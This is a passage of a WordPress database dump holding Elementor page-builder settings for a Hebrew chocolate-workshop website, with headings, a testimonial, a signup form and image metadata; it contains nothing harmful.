\\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4a4b992\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"c498248\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":30,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-kids.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5684ff50\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"id\":24,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/michael-browning-188999.png\"},\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#190606\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.75},\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"115\",\"bottom\":\"50\",\"left\":\"115\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"74663cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"125f3fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05d4 \\u05d4\\u05e9\\u05d1\\u05e2\\u05d9\\u05dd \\u05d4\\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd\",\"align\":\"center\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"50\"},\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"43\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"40\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6410b809\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"caption\":\"\\u05e0\\u05ea\\u05d9 \\u05d5\\u05d2\\u05d1\\u05e8\\u05d9\\u05d0\\u05dc\\u05d4 \\u05de\\u05e8\\u05d0\\u05e9\\u05d5\\u05df \\u05dc\\u05e6\\u05d9\\u05d5\\u05df\",\"text_color\":\"#cccccc\",\"caption_typography_typography\":\"custom\",\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":13},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c4e5757\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\\"\\u05ea\\u05de\\u05d9\\u05d3 \\u05d0\\u05d4\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d0\\u05e3 \\u05e4\\u05e2\\u05dd \\u05dc\\u05d0 \\u05d7\\u05e9\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d0\\u05e0\\u05d9 \\u05d0\\u05ea\\u05e8\\u05d2\\u05e9 \\u05db\\u05dc \\u05db\\u05da \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05dc\\u05dd \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7. \\u05ea\\u05d5\\u05d3\\u05d4 \\u05e8\\u05d1\\u05d4 \\u05dc\\u05e6\\u05d5\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3 \\u05e9\\u05e2\\u05d6\\u05e8 \\u05dc\\u05d9 \\u05dc\\u05de\\u05e6\\u05d5\\u05d0 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea!\\\"\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":28},\"typography_font_weight\":\"400\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"17\",\"bottom\":\"0\",\"left\":\"17\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"25\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"25\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"typography_font_style\":\"italic\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c25e365\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26},\"typography_font_weight\":\"bold\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_text_color\":\"#40272c\",\"background_color\":\"#edd0a8\",\"border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"50\",\"bottom\":\"20\",\"left\":\"50\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"15\"},\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#5c0011\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(113,37,'_elementor_version','0.4'),(116,38,'_wp_attached_file','2018/05/placeholder.png'),(117,38,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:800;s:4:\"file\";s:23:\"2018/05/placeholder.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"placeholder-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"placeholder-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"placeholder-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"placeholder-1024x683.png\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:9:\"image/png\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:23:\"placeholder-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(118,38,'_elementor_source_image_hash','33cd554a9e59b84d03688ef7b8165ab3628db324'),(119,39,'_wp_page_template','elementor_canvas'),(120,39,'_elementor_edit_mode','builder'),(121,39,'_elementor_template_type','post'),(122,39,'_elementor_data','[{\"id\":\"7e94e72f\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"vh\",\"size\":\"60\"},\"column_position\":\"stretch\",\"background_background\":\"classic\",\"background_image\":{\"id\":35,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/HDR.jpg\"},\"background_position\":\"center center\",\"background_size\":\"cover\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"25\",\"bottom\":\"40\",\"left\":\"25\",\"isLinked\":false}},\"elements\":[{\"id\":\"3b866986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.73)\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"63\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"53\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c8a61fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":33,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\"},\"space\":{\"unit\":\"%\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"_background_background\":\"classic\",\"_background_color\":\"#f1d5ad\",\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1f909fe7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d1\\u05d9\\u05d5\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"45\"},\"typography_font_weight\":\"100\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"0.9\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"38\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"35\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"35481412\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"22\"},\"typography_font_weight\":\"bold\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"20\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"18\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41e0dd23\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"eovd5tr\",\"required\":\"true\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"eovd5tr\"},{\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"_id\":\"68frv7y\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"68frv7y\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"width\":\"100\",\"_id\":\"p0rl9g7\",\"required\":\"\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"p0rl9g7\"}],\"show_labels\":\"\",\"button_text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"success_message\":\"The message was sent successfully!\",\"error_message\":\"There\'s something wrong... Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong... The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":\"10\"},\"row_gap\":{\"unit\":\"px\",\"size\":\"15\"},\"field_text_color\":\"#54595f\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_typography_typography\":\"custom\",\"button_typography_font_weight\":\"bold\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_background_color\":\"#5c0011\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"field_typography_typography\":\"custom\",\"field_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"13\"},\"button_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"22\",\"bottom\":\"22\",\"left\":\"22\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"button_background_hover_color\":\"#40272c\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f74ca63\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#e3e0dd\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"655473aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"55.702\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"12\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"13679594\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05d7\\u05d1\\u05e8\\u05d9\\u05dd\",\"align\":\"right\",\"title_color\":\"#40272c\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"35\"},\"typography_font_family\":\"Damion\",\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"31\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"30\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66f30f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9, \\u05d7\\u05dc\\u05e7\\u05e0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05d1\\u05d0\\u05e8\\u05d5\\u05d7\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e8\\u05e7 \\u05db\\u05d3\\u05d9 \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05ea\\u05e4\\u05e8\\u05d9\\u05d8 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e2\\u05d3 \\u05ea\\u05d5\\u05de\\u05d5, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05e0\\u05e2\\u05e9\\u05d4 \\u05d9\\u05d5\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd?<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05e6\\u05e8\\u05d5 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05e8\\u05d2\\u05e2\\u05d9\\u05dd \\u05d4\\u05d0\\u05dc\\u05d4, \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05d4\\u05d2\\u05d9\\u05e2 \\\"\\u05db\\u05de\\u05e2\\u05d8 \\u05e9\\u05d1\\u05e2\\u05d9\\u05dd\\\" \\u05d5\\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05e9\\u05e1\\u05d5\\u05d1\\u05d1\\u05d9\\u05dd \\u05e1\\u05d1\\u05d9\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1 \\u05e2\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d7\\u05dc \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05d6\\u05dc, \\u05d4\\u05db\\u05dc \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05dc\\u05de\\u05d3\\u05d9 \\u05d1\\u05db\\u05dc \\u05e6\\u05d5\\u05e8\\u05d4 \\u05d5\\u05e6\\u05d1\\u05e2, \\u05db\\u05dc \\u05d3\\u05e8\\u05da \\u05d5\\u05e9\\u05e2\\u05d4.\\u00a0<\\/p>\",\"text_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1.6\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"17\"},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"15f91cbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"44.298\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_position\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"385ae28\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/inner-hp.jpg\",\"id\":26}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4477cb\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"25\",\"bottom\":\"50\",\"left\":\"25\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"20\",\"bottom\":\"60\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"702ee38f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"60600fc4\",\"elType\":\"widget\",\"settings\